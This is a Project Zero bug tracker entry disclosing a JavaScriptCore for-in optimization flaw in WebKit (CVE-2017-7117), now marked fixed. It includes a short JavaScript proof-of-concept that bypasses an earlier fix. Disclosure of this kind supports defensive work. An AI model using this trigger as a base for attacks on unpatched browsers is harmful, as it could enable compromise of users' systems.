1319 - WebKit: JSC: Incorrect for-in optimization #2 - project-zero

Starred by 3 users

Status:	Fixed
Owner:	lokihardt@google.com
Closed:	Oct 3
Cc:	project-...@google.com
Deadline-90 Vendor-Apple CCProjectZeroMembers Severity-High Product-WebKit Finder-lokihardt Methodology-manual-experiment Reported-2017-Jul-05 CVE-2017-7117

WebKit: JSC: Incorrect for-in optimization #2

Project Member Reported by lokihardt@google.com, Jul 5

Back to list

The following PoC bypasses the fix for the  issue 1263 .

PoC:
function f() {
    let o = {};
    for (let i in {xx: 0}) {
        for (i of [0]) {

        }

        print(o[i]);
    }
}

f();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Project Member Comment 1 by lokihardt@google.com, Sep 21

Labels: CVE-2017-7117

Project Member Comment 2 by lokihardt@google.com, Oct 3

Status: Fixed

Project Member Comment 3 by lokihardt@google.com, Oct 3

Labels: -Restrict-View-Commit

► Sign in to add a comment